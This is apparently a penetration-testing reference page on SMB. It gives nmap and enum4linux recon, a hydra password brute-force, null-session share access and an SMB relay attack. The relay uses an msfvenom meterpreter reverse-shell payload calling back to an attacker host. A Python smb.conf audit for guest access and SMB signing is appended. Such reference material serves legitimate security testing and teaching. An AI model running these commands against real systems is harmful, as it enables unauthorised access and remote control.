Neko

139/445 SMB

SMB is home to many vulnerabilities that usually lead to compromise. We'll cover automated and basic manual enumeration and the transfer of files.

Last updated: May 4th, 2023

Automated Recon

nmap --script="smb*" -p 139,445 x.x.x.x
enum4linux -A x.x.x.x

Brute Force

hydra -t 4 -l username -P /usr/share/wordlists/rockyou.txt -vV x.x.x.x smb

Listing Shares

smbmap -H x.x.x.x
smbclient -N -L //x.x.x.x

Connecting

smbclient -N //x.x.x.x/share
smbclient -U 'user%pass' //x.x.x.x/share
mount -t cifs //x.x.x.x/sharename /mnt/smb -o guest

#smbrelay attack
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=port -f exe -o file_name.exe
smbrelayx -h x.x.x.x -e badexe.exe #use generated exe from above
psexec "<user>"@<ip> -
#meterpreter
use smb_login
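
From the defender's side, the null-session and guest connections and the relay shown above depend on two server settings: guest access and SMB signing that is not required. The following is an added example, not part of the original page: a small Samba `smb.conf` audit in Python. The sample configuration, the function name `audit_smb_conf` and the finding strings are constructed for illustration.

```python
import configparser

# Constructed sample smb.conf for illustration (not from the original page).
SAMPLE_CONF = """\
[global]
    workgroup = LAB
    map to guest = Bad User
    server signing = auto

[public]
    path = /srv/public
    guest ok = yes

[finance]
    path = /srv/finance
    valid users = @finance
"""

TRUTHY = {"yes", "true", "1", "on"}
SIGNING_REQUIRED = {"mandatory", "required", "force", "forced", "enforced"}


def audit_smb_conf(text):
    """Return sorted (section, finding) pairs for guest and signing weaknesses."""
    # Strip indentation so configparser never reads a line as a continuation.
    flat = "\n".join(line.strip() for line in text.splitlines())
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(flat)
    findings = []
    glob = next((cp[s] for s in cp.sections() if s.lower() == "global"), {})
    # Required signing is the standard mitigation for SMB relay.
    # Assumption: a missing or "default" value is treated as not required
    # (true for standalone and member servers, not for an AD DC).
    if glob.get("server signing", "default").lower() not in SIGNING_REQUIRED:
        findings.append(("global", "SMB signing not required"))
    # Any value other than "Never" maps some failed logons to the guest account.
    if glob.get("map to guest", "never").lower() != "never":
        findings.append(("global", "failed logons mapped to guest"))
    for name in cp.sections():
        sec = cp[name]
        guest = {sec.get("guest ok", "no").lower(), sec.get("public", "no").lower()}
        # Shares reachable with `smbclient -N` or `mount -o guest`.
        if name.lower() != "global" and TRUTHY & guest:
            findings.append((name, "share allows guest access"))
    return sorted(findings)


if __name__ == "__main__":
    for section, finding in audit_smb_conf(SAMPLE_CONF):
        print(f"[{section}] {finding}")
```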